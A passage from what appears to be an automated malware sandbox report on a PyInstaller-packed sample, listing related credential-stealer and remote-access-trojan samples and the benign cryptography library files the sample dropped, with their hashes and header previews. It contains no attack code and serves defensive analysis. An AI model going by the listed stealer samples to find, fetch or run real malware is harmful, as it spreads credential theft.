                                                                                                                                                                                                Creal.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                  QmF9bcCME5.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                    OdHYFIHCT9.exeGet hashmaliciousLaZagne, MimikatzBrowse
                                                                                                                                                                                                      Vanta Installer.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                        AresV1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          AresV1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            dcntel.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              Disney [CHECKER] V3.2.exeGet hashmaliciousAsyncRAT, StormKittyBrowse
                                                                                                                                                                                                                Crunchyroll [CHECKER 2023] V1.3.exeGet hashmaliciousAsyncRAT, StormKittyBrowse
                                                                                                                                                                                                                  322pVOVprx.exeGet hashmaliciousCreal StealerBrowse
                                                                                                                                                                                                                    reaper.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                                      PonysGW.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                                        blackcap.exeGet hashmaliciousMicroClipBrowse
                                                                                                                                                                                                                          yeet.exeGet hashmaliciousMicroClipBrowse

                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_ARC4.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):11264
                                                                                                                                                                                                                            Entropy (8bit):4.693594490869205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:BZ9VD9daQ2iTrqT+y/ThvQ0I1uLfcC75JiC4Rs89EcYyGDVM0OcX6gY/7ECFV:r9damqT3ThITst0E5DVKcqgY/79X
                                                                                                                                                                                                                            MD5:ABA0195EB33D86216170DCFF947DEBDB
                                                                                                                                                                                                                            SHA1:ACBE4DC26AD65DE51385CD95128491C64DEF9502
                                                                                                                                                                                                                            SHA-256:1F588A0D71C5378987FE05224493D85E93D02A52CE0B05809A06FC2BD489C325
                                                                                                                                                                                                                            SHA-512:8E4C7E02E55C7A64F81A2256A0B926A8CAD676571B6F822F7FDFDA5E4CC3EBF2A3EE45188BA2D2D639977CD4DCDBD737CA33DE7E838F3CD0B17C948AF6B65280
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                            • Filename: npp.8.5.3.Installer.x64342423423423424242423423424.bat, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: VespyTokengrabber20.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: FlappyBird.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Creal.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: QmF9bcCME5.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: OdHYFIHCT9.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Vanta Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: AresV1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: AresV1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: dcntel.dll.dll, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Disney [CHECKER] V3.2.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: Crunchyroll [CHECKER 2023] V1.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: 322pVOVprx.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: reaper.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: PonysGW.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: blackcap.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            • Filename: yeet.exe, Detection: malicious, Browse
                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...ba.c.........." ..."............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_Salsa20.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                            Entropy (8bit):5.048707283691193
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:HjNF/1nb2eqCQtkluknuz4ceS4QDuWA7cqgYvEP:D52P6luLtn4QDBmgYvEP
                                                                                                                                                                                                                            MD5:5B855B3E838D9C7FAAD4BD736CF56D59
                                                                                                                                                                                                                            SHA1:AD51237A6E2D1BEEFDDABFC8BD8AC0E205ED735F
                                                                                                                                                                                                                            SHA-256:7D1B252ADC643DEEB896430B58CF457436152351EB7FA043B4B24736C9EDF864
                                                                                                                                                                                                                            SHA-512:180207B3BD88976240ECCF39F2F174AF0D13FEEFD9B22B92363C0D947E8BD5B1523417A73D4B5AAF9252A59162E34E2F5DF76C837CBD1B458D1830F4D4C70918
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...ca.c.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..L............p..,....3...............................1..@............0...............................text...h........................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..L....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_chacha20.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                            Entropy (8bit):5.051714127100642
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:D22P6XTr0zXgWDbuQ0vdvZt49MgYvEMN:DN6XTragWDP9Jq
                                                                                                                                                                                                                            MD5:5298CA8A45BB3ADD1A03EC4CF8A46072
                                                                                                                                                                                                                            SHA1:CE7984FACB2DE472E247E4BBA042FEB406E1ABE1
                                                                                                                                                                                                                            SHA-256:D70795D5B6103AC1D81794D209085C573E4554A312CCD762CC5767AC98E5965C
                                                                                                                                                                                                                            SHA-512:B319464E07F3148F2079E22DB5B13CA08CCFE1986CD26A066B07147D6BF28E8B5D764C80AA22A33A5DFD7C9BC66FE39CBC4FC800E7FF6E13F0DE8856760A7242
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...ca.c.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..d....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_pkcs1_decode.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                                            Entropy (8bit):5.103885048328888
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:2YoF1siKeai1dqmJo0qVVLf/+NJSC6sc9kJ9oPobXXXP4IIYOxDml8jcX6gRth2h:MsiHfq5poUkJ97zIDmlucqgRvE
                                                                                                                                                                                                                            MD5:68FD499C14CDDA49C5460E377410C30E
                                                                                                                                                                                                                            SHA1:16CD9C10C564F4FB16CEEE33DA21BD4D4EB367B9
                                                                                                                                                                                                                            SHA-256:48958204C0CC8412758C33FB4A970C87A83BE5A8A889959FE8831793D8102E06
                                                                                                                                                                                                                            SHA-512:A9B529560ABDEF38110A2147EF3E7924EA43A75D946D95CEB745015B690811AA2509F387D7868F1C9C6BE526E2E32A764FE84C062CAD315FEEE344F38D9819F9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............h...h...h......h..i...h..i...h...i...h..m...h..l...h..k...h...`...h...h...h.......h...j...h.Rich..h.........PE..d...aa.c.........." ..."............P.....................................................`.........................................P8..p....8..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aes.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36352
                                                                                                                                                                                                                            Entropy (8bit):6.554132422005377
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:Wf+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuxLg4HPy:uqWB7YJlmLJ3oD/S4j990th9VxsC
                                                                                                                                                                                                                            MD5:3BD3AF4C84932CD1AB5A8084040A76F6
                                                                                                                                                                                                                            SHA1:FD0429540688A8B2F6812C6347946910C6E8765D
                                                                                                                                                                                                                            SHA-256:437E89FD3DD47F5DEB6165F4F2A7F228CD415FB7F3D5DF5C1CB16A90044008CE
                                                                                                                                                                                                                            SHA-512:01DC0DDD1859E67A3C7B6EA92121CF1DBC2B8E440F9ECC5F182CAAC576FEEA57637D8437314058BCE7DE65DD2BFF70411A667CAA042FA51F8630B641E33E9C81
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........&...H...H...H......H..I...H..I...H...I...H..M...H..L...H..K...H...@...H...H...H.......H...J...H.Rich..H.........................PE..d...^a.c.........." ...".H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_aesni.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                            Entropy (8bit):5.236024148269018
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:bURwiJsmXl02v8Y1uGniDOYtn3gwYUMvE:Owi6IOO1uGiDJtQwYU
                                                                                                                                                                                                                            MD5:0BA521EBCF0851B1283DC25766490460
                                                                                                                                                                                                                            SHA1:84C7F4E5CDA3F41461E95A11C35F438C10961EFC
                                                                                                                                                                                                                            SHA-256:782CB833FA04DAFA51BF1CB8CC811D71C9C6598208EED046EF5D8294E3651818
                                                                                                                                                                                                                            SHA-512:E02760F673BCBFEAAB3AAD86AD355070F80E573A68FBCE4DEB46AB5873A80D0B8B6744753F44437220E85D4D8E8D65D214780BF4EF5883AC92D05ECBCFD6DA96
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........eX.o...o...o.......o.......o.......o...o...o.......o.......o.......o.......o.......o.......o.......o..Rich.o..........................PE..d...^a.c.........." ..."..... ......P.....................................................`..........................................9......d:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0......."..............@..@.data...(....@.......2..............@....pdata.......P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_arc2.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                            Entropy (8bit):5.563552079767176
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:HJDd9Vk3yQ5f8vjVKChhXoJDkq6NS7oE2DDmlWw2XpmdcqgwNeecBU8:jk/5cj4shXED+o2Df8zgwNeO8
                                                                                                                                                                                                                            MD5:75A2D9A48DF773694E82534635BE7B9C
                                                                                                                                                                                                                            SHA1:4DC026B68CF697E8C5803775A5A9DAD656F8B247
                                                                                                                                                                                                                            SHA-256:B8D36C0ED8C994ED11F36B2ABC7D3C5116C215719BDC19C9596BB9E3FB811A4B
                                                                                                                                                                                                                            SHA-512:6221071EE7D441FFD83229B106B448DEF0E59354F17B16048D5C169583312ADE5534175F6D8A02C0827D68682C4343C27E3F002E5FC126C5F2300E0EC00EE18C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d..._a.c.........." ..."."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_blowfish.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):20992
                                                                                                                                                                                                                            Entropy (8bit):6.0599723099798455
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:BU/5cJMOZA0nmwBD+XpJgLa0Mp8QAg4P2llyM:uK1XBD+DgLa1FTi
                                                                                                                                                                                                                            MD5:AAF446AAF23C92FAD7D41B82DAA6F03C
                                                                                                                                                                                                                            SHA1:61914BE2ABDE68D24919E5F9124256EFB3A35B97
                                                                                                                                                                                                                            SHA-256:0432E9CF535C5C50DFA6776777BA89A2076BBF2DC6DB0EFA6C84483F501B00E3
                                                                                                                                                                                                                            SHA-512:B95E6FA8B5CAF3085EED7E654B52AB2C734C9976223F0F8F8801CE98DD2531A4019B9879FFD468130BFBBED931B26C9148F3A9B91C8F4353B3492280E693BED4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d..._a.c.........." ...".$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cast.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):25088
                                                                                                                                                                                                                            Entropy (8bit):6.456355167983997
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:icaHLHH4o07ZXmrfXA+UA10ol31tuXy1i/7gLWi:HaHLH4o0NXmrXA+NNxWiU/8LWi
                                                                                                                                                                                                                            MD5:07D25B197C0E35BFD3C96550C5C64A6D
                                                                                                                                                                                                                            SHA1:51B7D8D18EF6D67830F58124B0C5B685A34A067B
                                                                                                                                                                                                                            SHA-256:FEFFAED6DBF10D4359DE74F6DA88C03C6A6B50D1568C5330343927E7797E3EC1
                                                                                                                                                                                                                            SHA-512:1FB783FF9B10CD5EF02C2E00BA5594561AE6CD5F2DBE0D87D746A3E257579B7EC4644D44456F6D6119B2D3AF90613F5AC8CAA9D34A1D8B78550C532FCB78722D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...`a.c.........." ...".$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....".......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cbc.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                            Entropy (8bit):4.741900053920983
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:HKF/1nb2eqCQtkrKnlPI12D0gacqgYvEn:A2P6KlPe2D4gYvEn
                                                                                                                                                                                                                            MD5:A1B78A3CE3165E90957880B8724D944F
                                                                                                                                                                                                                            SHA1:A69F63CC211E671A08DAAD7A66ED0B05F8736CC7
                                                                                                                                                                                                                            SHA-256:84E071321E378054B6D3B56BBD66699E36554F637A44728B38B96A31199DFA69
                                                                                                                                                                                                                            SHA-512:15847386652CBEE378D0FF6AAD0A3FE0D0C6C7F1939F764F86C665F3493B4BCCAF98D7A29259E94ED197285D9365B9D6E697B010AFF3370CF857B8CB4106D7D8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........EY.o+..o+..o+......o+...*..o+...*..o+..o*..o+......o+.../..o+...(..o+...#..o+...+..o+......o+...)..o+.Rich.o+.................PE..d...aa.c.........." ..."............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_cfb.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                            Entropy (8bit):4.898232178128461
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:PRgPfqLlvIOP3bdS2hkPUDkfoCM/vPXcqgzQkvEmO:oYgAdDkUD1CWpgzQkvE
                                                                                                                                                                                                                            MD5:0DCA79C062F2F800132CF1748A8E147F
                                                                                                                                                                                                                            SHA1:91F525B8CA0C0DB245C4D3FA4073541826E8FB89
                                                                                                                                                                                                                            SHA-256:2A63E504C8AA4D291BBD8108F26EECDE3DCD9BFBA579AE80B777FF6DFEC5E922
                                                                                                                                                                                                                            SHA-512:A820299FBA1D0952A00DB78B92FB7D68D77C427418388CC67E3A37DC87B1895D9AE416CAC32B859D11D21A07A8F4CEF3BD26EBB06CC39F04AD5E60F8692C659B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................;..................................................................W.............Rich............................PE..d...aa.c.........." ..."..... ......P.....................................................`..........................................9.......9..d....`.......P..d............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ctr.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                                            Entropy (8bit):5.29833269304069
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:OJ1gSPqgKkwv0i8NSixSK57NEEE/qexcEtDrYDjRcqgUF6+6vEX:uE1si8NSixS0CqebtDErgUUjvE
                                                                                                                                                                                                                            MD5:785F15DC9E505ED828356D978009ECCE
                                                                                                                                                                                                                            SHA1:830E683B0E539309ECF0F1ED2C7F73DDA2011563
                                                                                                                                                                                                                            SHA-256:B2B68DE1D7E5997EB0C8A44C9F2EB958DE39B53DB8D77A51A84F1D1B197B58B1
                                                                                                                                                                                                                            SHA-512:16033B72BE6D66AB3A44B0480EB245D853A100D13A1E820EFF5B12CE0BB73E17D6E48B3E778D1B20D0C04FE1FB8A5723C02ED8AF434AE64D0944F847796D98F2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........F...(...(...(......(..)...(..)...(...)...(..-...(..,...(..+...(... ...(...(...(.......(...*...(.Rich..(.........PE..d...ba.c.........." ..."..... ......P.....................................................`..........................................9......x:..d....`.......P...............p..,....3...............................1..@............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):57856
                                                                                                                                                                                                                            Entropy (8bit):4.258215596987393
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:JUqVT1dZ/lHkJnYcZiGKdZHDLriduprZRZB0JAIg+v:zHlHfXid6X
                                                                                                                                                                                                                            MD5:B9500783D7451E625999BFE450C7D02F
                                                                                                                                                                                                                            SHA1:BA22CDFD949089D7BDC9397AF35A45A2010736C4
                                                                                                                                                                                                                            SHA-256:67DA8E4B89954E385D282096F05867047A9EDF6434D2C148DD384AEEA782B19A
                                                                                                                                                                                                                            SHA-512:0069FA0E96331F9E25F0C191EEC482A734DFA66403CB3544F401455A3B1E9B0E9B5D0CEEF91F3B62CA867B52FAF83C98F5BB362F052E5F1111A156BCBD7A3761
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3.ANRg.NRg.NRg.G*..JRg...f.LRg..*f.MRg.NRf.hRg...b.BRg...c.FRg...d.JRg...o.ORg...g.ORg.....ORg...e.ORg.RichNRg.........PE..d...`a.c.........." ...".8...................................................0............`.....................................................d...............l............ ..4...................................@...@............P...............................text....7.......8.................. ..`.rdata..f....P.......<..............@..@.data...8...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_des3.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\PAP46E1UkZ.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):58368
                                                                                                                                                                                                                            Entropy (8bit):4.274897877598529
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:1Uqho9weF5/dHkRnYcZiGKdZHDLhidErZ/ZYmGg:nCndH/lidgz
                                                                                                                                                                                                                            MD5:DDBE90EDE6A159167987500E1F1FA56F
                                                                                                                                                                                                                            SHA1:F4402803BC23288C7A790A8F1E9EDD6633E54203
                                                                                                                                                                                                                            SHA-256:77B8C96A7880961397D8B201F26D5C1608114FDDF9012614378472615D9F8CCE
                                                                                                                                                                                                                            SHA-512:B8E61748F6A07A8FCBEE2CC46410071E878E35D4058B4FA771CEBCB3DC24A65961487227CA4C1A2FFA14713D8A03CEEB4F40949125E2977A7B0739889ACCB56A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3.ANRg.NRg.NRg.G*..JRg...f.LRg..*f.MRg.NRf.hRg...b.BRg...c.FRg...d.JRg...o.ORg...g.ORg.....ORg...e.ORg.RichNRg.........PE..d...`a.c.........." ...".:...................................................0............`.................................................P...d............................ ..4...................................@...@............P...............................text...x9.......:.................. ..`.rdata.......P.......>..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI70922\Crypto\Cipher\_raw_ecb.pyd

                                                                                                                                                                                                                            Download File
